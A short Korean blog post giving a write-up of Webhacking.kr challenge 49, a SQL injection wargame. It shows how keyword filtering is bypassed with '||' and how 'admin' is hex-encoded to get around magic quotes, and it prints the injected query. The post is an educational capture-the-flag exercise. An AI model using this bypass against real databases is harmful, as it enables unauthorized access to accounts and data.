cdor1's lab
Webhacking.kr 49번 본문
sql injection의 베이직 같은 문제이다.
웬만한 sql문은 거의 다 필터링해서 어떻게 해야하나 막막했는데
||, &&같은 연산 기호들은 사용할 수 있었다.
select id from members where lv=2 or id='admin'
select id from members where lv=2 || id='admin'
이렇게 넣어줘 lv이 2이거나 id가 어드민인 값을 뽑아내면 되는데
lv=2는 거짓으로 나타나므로 or 연산을 이용해 id가 어드민인 값을 뽑아내려고 한다.
php매직쿼터때문에 '가 필터링되고 admin값 또한 똑바로 들어가질 않았다.
hex로 인코딩해서 넣어주자.
select id from members where lv=2||id=0x61646D696E
'Security > Web' 카테고리의 다른 글
Webhacking.kr 43번 (0) | 2017.04.19 |
---|---|
Webhacking.kr 44번 (0) | 2017.04.17 |
Webhacking.kr 28번 (0) | 2017.04.06 |
Webhacking.kr 50번 (0) | 2017.04.05 |
Webhacking.kr 21번 (0) | 2017.04.04 |
Comments